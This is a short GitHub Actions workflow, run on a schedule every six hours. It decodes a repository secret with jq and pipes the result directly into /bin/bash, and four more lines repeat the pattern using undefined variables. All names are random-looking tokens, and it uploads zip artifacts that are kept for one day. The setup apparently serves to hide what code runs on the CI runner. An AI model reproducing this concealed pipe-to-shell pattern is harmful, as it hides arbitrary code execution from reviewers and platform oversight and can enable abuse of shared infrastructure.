name: richengnongtai
on:
  workflow_dispatch:

  schedule:
    - cron: '15 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: richengnongtai
        env:
          katg31380: ${{ secrets.katg31380 }}
        run: |
          printf '%s' "$katg31380" | jq -r .jbth48292 | /bin/bash
          printf '%s' "$zm40944" | jq -r .ezsm300 | /bin/bash
          echo $bak84874 | jq -r .bmugf0222 | /bin/bash
          printf '%s' "$ab66" | jq -r .rekcd213 | /bin/bash
          echo $x754 | jq -r .ilh2660 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: bqfyIzlW
          path: "*.zip"
          retention-days: 1
